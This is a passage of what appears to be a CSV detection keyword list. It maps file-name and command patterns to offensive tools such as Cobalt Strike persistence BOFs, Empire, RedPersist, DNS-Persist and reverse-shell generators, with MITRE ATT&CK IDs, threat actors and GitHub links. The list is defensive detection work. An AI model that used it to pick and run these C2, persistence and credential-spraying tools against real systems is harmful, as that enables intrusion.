TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*Perform password spraying for all active users on a domain*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*Performing recursive ShadowSpray attack*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*perl nikto.pl -h*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","0","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*perl_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*perl-reverse-shell.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*PersAutorun.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PersCLRInstall.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*persist exceladdin*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*persist logonscript*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*persist run *hkcu*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*persist run *hklm*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*persist runkey*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*persist spe *.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Persist.cna*","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","1","1","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" +"*Persist\autorun.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\eventviewer.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\powershell.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\screensaver.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\startup.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\winlogon.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*PersistBOF.cna*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*Persistence.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*Persistence.exe*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Persistence/InstallWMI*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Persistence_AccountManipulation_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_Guard_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_LogonScripts_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_NewService_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_OfficeApplicationStartup_OfficeTest.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_Other_WindowsLibraryMs.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_RegistryRunKeys_SharpHide.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_RegistryRunKeys_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_ScheduledTask_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_WinlogonHelperDLL_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PersistenceBOF.c*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersistenceBOF.exe*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persistent-security/SMShell*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*persist-ice-junction.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-monitor.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-shortcut.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-time.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-xll.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 